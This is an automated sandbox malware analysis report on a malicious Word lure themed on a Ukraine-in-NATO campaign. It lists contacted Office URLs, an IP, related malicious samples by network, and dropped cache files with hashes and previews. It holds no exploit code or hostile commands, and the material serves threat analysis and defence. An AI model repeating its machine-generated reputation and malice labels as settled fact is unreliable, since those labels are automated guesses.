                                              https://powerlift-frontdesk.acompli.net3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://tasks.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                		high
                                                https://officeci.azurewebsites.net/api/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                  		high
                                                  https://api.scheduler.3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://my.microsoftpersonalcontent.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://store.office.cn/addinstemplate3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://api.aadrm.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                    		high
                                                    https://globaldisco.crm.dynamics.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                      		high
                                                      https://messaging.engagement.office.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                        		high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                          		high
                                                          https://dev0-api.acompli.net/autodetect3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.odwebp.svc.ms3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://api.diagnosticssdf.office.com/v2/feedback3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                            		high
                                                            https://api.powerbi.com/v1.0/myorg/groups3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                		high
                                                                https://api.addins.store.officeppe.com/addinstemplate3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://graph.windows.net3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                  		high
                                                                  https://dataservice.o365filtering.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://officesetup.getmicrosoftkey.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://analysis.windows.net/powerbi/api3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                    		high
                                                                    https://prod-global-autodetect.acompli.net/autodetect3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://substrate.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                      		high
                                                                      https://outlook.office365.com/autodiscover/autodiscover.json3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                        		high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                          		high
                                                                          https://consent.config.office.com/consentcheckin/v1.0/consents3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                            		high
                                                                            https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                              		high
                                                                              https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                		high
                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                  		high
                                                                                  https://d.docs.live.net3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://ncus.contentsync.3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                    		high
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                      		high
                                                                                      http://weather.service.msn.com/data.aspx3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                        		high
                                                                                        https://apis.live.net/v5.0/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                          		high
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                            		high
                                                                                            https://messaging.lifecycle.office.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                              		high
                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                		high
                                                                                                https://pushchannel.1drv.ms3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                  		high
                                                                                                  https://management.azure.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                    		high
                                                                                                    https://outlook.office365.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                      		high
                                                                                                      https://wus2.contentsync.3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://incidents.diagnostics.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                        		high
                                                                                                        https://clients.config.office.net/user/v1.0/ios3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                          		high
                                                                                                          https://make.powerautomate.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://insertmedia.bing.office.net/odc/insertmedia3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                            		high
                                                                                                            https://o365auditrealtimeingestion.manage.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office365.com/api/v1.0/me/Activities3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                		high
                                                                                                                https://api.office.net3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                  		high
                                                                                                                  https://incidents.diagnosticssdf.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                    		high
                                                                                                                    https://asgsmsproxyapi.azurewebsites.net/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://clients.config.office.net/user/v1.0/android/policies3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                      		high
                                                                                                                      https://entitlement.diagnostics.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                        		high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                          		high
                                                                                                                          https://substrate.office.com/search/api/v2/init3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                              		high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocation3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                		high
                                                                                                                                https://login.windows.local3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://outlook.office365.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://webshell.suite.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://login.microsoftonline.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://substrate.office.com/search/api/v1/SearchHistory3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          74.50.94.156
                                                                                                                                          		unknownUnited States
                                                                                                                                          		19318IS-AS-1USfalse

                                                                                                                                          Private

                                                                                                                                          IP
                                                                                                                                          192.168.2.1

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                          Analysis ID:1266120
                                                                                                                                          Start date and time:2023-07-03 19:16:25 +02:00
                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 6m 54s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                          Number of analysed new started processes analysed:3
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • HDC enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample file name:Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal72.spyw.evad.winDOC@3/41@0/2
                                                                                                                                          EGA Information:Failed
                                                                                                                                          HDC Information:Failed
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 0
                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .doc
                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                          • Attach to Office via COM
                                                                                                                                          • Scroll down
                                                                                                                                          • Close Viewer

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): WMIADAP.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.32.24, 20.231.69.218, 20.223.130.133, 20.224.201.79
                                                                                                                                          • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          19:17:36API Interceptor1x Sleep call for process: splwow64.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          No context

                                                                                                                                          Domains

                                                                                                                                          No context

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          IS-AS-1USCdNslw8Sk8.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                          • 64.20.61.146
                                                                                                                                          CdNslw8Sk8.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                          • 64.20.61.146
                                                                                                                                          lzMMApbdRw.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                          • 64.20.61.146
                                                                                                                                          lzMMApbdRw.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                          • 64.20.61.146
                                                                                                                                          c8GgBkDb3N.exeGet hashmaliciousRMSRemoteAdmin, RedLineBrowse
                                                                                                                                          • 64.20.61.146
                                                                                                                                          https://e.targito.com/c?a=a765e20b-92d0-4544-a4c3-c23518cbf01d&o=gsklub_cz&m=6b67e0df-8f21-4d26-bac6-98abbf8b9329&c=75283f30-ec7c-4c64-8e96-b11b9ceb9007&d=1550125868&l=footer_menu_2&u=http://jtq.hummingbird-hemp.sa.com/jumeirah/YWJyYWhhbS5jaGFja29AanVtZWlyYWguY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 173.214.160.47
                                                                                                                                          AnyDesk_SetupV3.12.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                          • 64.20.61.146
                                                                                                                                          AnyDesk_SetupV3.12.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                          • 64.20.61.146
                                                                                                                                          iI6NKK6i4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          40SCua6qXH.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          8YxhSD1jYK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          Wt6Ggw62Gk.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          WmX5iiA1zx.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          Dm9169jB1I.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          4c3NLEtpjf.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          xnDXPtRLCO.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          8WCdSJMG6y.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          4q6H5y3eet.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246
                                                                                                                                          GTg4MYBHb5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 74.50.88.246

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3D1FB6CF-CA85-4987-88F9-38A65DB2B247

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):157328
                                                                                                                                          Entropy (8bit):5.349049214497573
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:P+C/FPgfHB7U9guw19Q9DQA+zQvk4F77nXmvidlXRjE6LRj6h:KDQ9DQA+zQXWh
                                                                                                                                          MD5:2C04D4384A25BBFAFB02FAB4FFDA731E
                                                                                                                                          SHA1:CFAB4FF1347CDD942115A84CFB8E9FE3022543C6
                                                                                                                                          SHA-256:372E1269A5D86F5D1D8E19709293063E692E2D038FC93BC5A07D3F0B5F4DE62C
                                                                                                                                          SHA-512:A8E3B6D141F61A8E6AB3927EE91EDC09DEED7EB5D77B27EA077B57CDB73144A1DD39748B2959392C21990F37C1698C9EA140F7D7AAC2507A8F7CE87CDDF692A9
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-07-03T17:17:22">.. Build: 16.0.16626.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\12A864E7.png

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:PNG image data, 219 x 219, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):96252
                                                                                                                                          Entropy (8bit):7.9932951858885435
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:1536:oULeKytQVl7xR8oLcrDGKaCeOSd8H2vRCcwziwX4Ym0sIe7wHvUExq2hCIXy1:oULFyt0l7P8trDG5CL1WvRC5pugMExF0
                                                                                                                                          MD5:BC1CCF91CC3D7F39497E5287B10EB78B
                                                                                                                                          SHA1:0E84A621E84212D161418B6D6629AB91B2A41FCD
                                                                                                                                          SHA-256:88E4EC9AF07F3B56D4131D0A2D2EECC63F971CA41E185904036BA0B41B40BBB6
                                                                                                                                          SHA-512:E542531996D95FF6337CE2B59D39024AD74E1228C5C2F039F23B0BCFAC94BE55FECB99B575112885A57E4BE29CC13E4459B7CDBAFB58D9FAB2E3D19102BF3C08
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.PNG........IHDR...............@....IDATx^......><.4.4.M.....M.].nl@b..h.Q`...0PRD@z.......Z..G=z<.9..........O.k.k..=.=~.hG.Z.....Z8[u..q.#g.g+.nm........J..TS^k...|..Zt.u.v~Nf..m.L[.u>oA.7.&?...w\...o....v.9...j.e...t..j_n.c../....<GG.n...:....8.~.............%.H.._...s.uh.....).-|l.v%.".m:p5...%..6...]...C+.i{%...Q}?..D?............x....bt.D,..D.5..h..L....Zi8lS .w@j...8w."j.\@Ay=..V....hO...8../...M_..X...+3v`i.v..|/2v.D.W....2|}....*P^w../^....."...N..=.tJE.S..(...d....:....:....14..I...i.]^k... 4...5......v.....2d~v.q....Mx.'.....c0....<#..<.a...#go.8.p.A...z...e.|t.^..|...F..0..k8z..c.W0n.#.V..`...s..<....%..2}'.......4......04."@j..c..y<r..2j.hU..{...o...!.G?.....] &........[q......#t.Wxr.Z.<..C...9.c`...6..2........w...K,.\.`.....p.(..n1...n.`...<"`...v.0.7...}`.....x.%r.q.w.Bw.`t.'(m..)...P...c..?&=...^_.7...d3Ax....^Rj.......*>.(..h.^.=...7.~...o}?.\..o..`Y.v<....O%....;A.B.m.....RE..#.F.=8..FpF..G.[.z.......$..{....sO>.yO.8..

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BB84B4FE.url

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eduardo, Template: Normal.dotm, Last Saved By: Eduardo, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 13 14:11:00 2022, Last Saved Time/Date: Wed Apr 13 14:11:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):23870
                                                                                                                                          Entropy (8bit):3.126890272974214
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:zWjUlLZEvA+6/6rNavrgYjk+4bWl92zBi1RH1rGOJU:zWjo8iSwvxjk+t9+i1RH1rG3
                                                                                                                                          MD5:26A6A0C852677A193994E4A3CCC8C2EB
                                                                                                                                          SHA1:70560AFF35F1904F822E49D3316303877819EEF8
                                                                                                                                          SHA-256:07377209FE68A98E9BCA310D9749DAA4EB79558E9FC419CF0B02A9E37679038D
                                                                                                                                          SHA-512:BF35991FEC81B96EAE2CE5C90AE627DD6CF11C61C5369DC34BBBC65E24C3E1F413F475BDB8321F455E5F4B6EAA833B3D33F847C744C68AE6E853A373AD2B37AE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>.........<html>........'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................=.............................bjbj..............................L..hL..h..................................................................................F.......F...............................................................................................................t...................................................................M.......O.......O.......O.......O.......O.......O...$...B...........F...s.....................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BB84B4FE.url:Zone.Identifier

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26
                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:gAWYp:qYp
                                                                                                                                          MD5:ACC88D3264FC06AE3584A8ED90009260
                                                                                                                                          SHA1:FD63700F852BE379C417253CA869CC1C5E2F46A0
                                                                                                                                          SHA-256:E9066838A2265B9327318C602ED6954BC1A26869C19FAA255CD26A3C7CE707A7
                                                                                                                                          SHA-512:CB41EF87941B26F1CB25DB61536A6C89F3B7A3BC67B4CFBE7290DD528DACC6870A08CDC2AABAF289382A5CD7EF96C95556B05B8EAD3FB1317DFCD18B6302E456
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[ZoneTransfer]..ZoneId=1..

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32768
                                                                                                                                          Entropy (8bit):1.728408315871704
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:DS7Q6BS7Q1ODSODlK2K+S7Q1ODpKQS7Q1ODpK:WMfM1MVM
                                                                                                                                          MD5:C9A8F0CF3BA00E68CF681064112C61F5
                                                                                                                                          SHA1:E0F67CD2774836076F5C9269D9BFB13C92117C53
                                                                                                                                          SHA-256:6914A54ACEE03E5B7A3790DA32EF689C35F9FDB0CA133AC95C53A85A1E880531
                                                                                                                                          SHA-512:DFE074AF6E4D3729A404A5B1E7025CE0C35D7CC55F3F36E12E1F697660228B57A43BB38726CB33705DBC30EE68204BC51F8524426B72F7D14E70F050F35C4A5F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9A4BB1BC-FD21-436D-8968-81A6D4A41BFC}.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8192
                                                                                                                                          Entropy (8bit):3.2278335278897203
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:dixTL8H5svkLvwbVFnYk12kj98zlz/InyVS/VF2we1ki92VnX6FQNmyxUWou/aCU:4MH9vwpq0bx8d/stiyDnLDxnlpU
                                                                                                                                          MD5:4FE05F0820EED1BD3D5229774B9F5ED3
                                                                                                                                          SHA1:5E33F699D9D2BF7F1C1BCD893DEA3031333DC37C
                                                                                                                                          SHA-256:A18D1B7695C360B572F6A229C995873C12302F1DDDE9D199313CDCC0EA733C43
                                                                                                                                          SHA-512:97005EB8F3B0F9128F1906BC0AC0FE11923FF62541BBA756F100E63BD3BFB9954EEFB6E3F4806DE4BC3F68330A4487341FBDA8DCB635E6C308FDB88BAB0CCEB9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:../.................T.a.l.k.i.n.g. .p.o.i.n.t.s. .f.o.r. .U.W.C.. s. .#.U.k.r.a.i.n.e.I.n.N.A.T.O. .c.a.m.p.a.i.g.n.....T.o.d.a.y.,. .U.k.r.a.i.n.e. .i.s. .f.i.g.h.t.i.n.g. .f.o.r. .m.o.r.e. .t.h.a.n. .i.t.s. .o.w.n. .f.r.e.e.d.o.m.,. .i.n.d.e.p.e.n.d.e.n.c.e. .a.n.d. .s.o.v.e.r.e.i.g.n.t.y.;. .U.k.r.a.i.n.e. .i.s. .f.i.g.h.t.i.n.g. .f.o.r. .t.h.e. .f.r.e.e.d.o.m. .o.f. .E.u.r.o.p.e. .a.n.d. .f.o.r. .t.h.a.t. .o.f. .t.h.e. .e.n.t.i.r.e. .F.r.e.e. .W.o.r.l.d.,. .f.o.r. .t.h.e. .v.e.r.y. .v.a.l.u.e.s. ...............................................v...x...........Z.......8...:.......B....... ..."................................................................................................................................................................................................................................................................................................................................................................................................d........&..F..

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{A2480377-BCE3-4416-A702-F7E7C8C6A77A}.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1024
                                                                                                                                          Entropy (8bit):1.0858937549421035
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:dXXXXXXXPN6dn/lDl/PlXllZrGzy/Csnlpoh3llprVlpwz1i8lpxoUllpKJllpBK:CAzTElponlpJlpwk8lpBlp8lpFlpKtn
                                                                                                                                          MD5:C0E2E7412E3F392B7753B564C92F164C
                                                                                                                                          SHA1:E195E7A4329CC2A307E5FDF80C15CC255AD03CE6
                                                                                                                                          SHA-256:EE57097CADF9AB862FC60C18426CB6360EF154A03A576308701C04BFC853478D
                                                                                                                                          SHA-512:2F0496B226FCC939867A5234C6898F26E691EDE7B238AE632BB4CCD9CD0067F8FAA35689F44449A2B8FB4E61C2AB082F8C678724EC477C3A287296038DC72185
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:(.(.(.(.(.(.(.(.(.(.(.p.r.a.t.e.s.h.p.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.....hBG.....j.....hBG.....j.....hBG.....j.....hBG.....j.....hBG.....j..L..hBG.....j.

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D1A74FD9-95F0-4A7B-AE12-DD660EE646E9}.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1636
                                                                                                                                          Entropy (8bit):2.550711213392701
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:qWwAwNKl6ATQu1it0TAwqv/Aj/QodQQq+R0Yq/lN103Ka3z:qWwAQKpTQuEHk4gR0Yq/dMz
                                                                                                                                          MD5:947E3356A835C93D21AD49186C723F97
                                                                                                                                          SHA1:1D31B02EDA72B614660C9A4DA9FF438C5AC58BE5
                                                                                                                                          SHA-256:37C7915F7FBC726F10A8547E03AC8070647EF2C0AA1A584A41F470211B7896A7
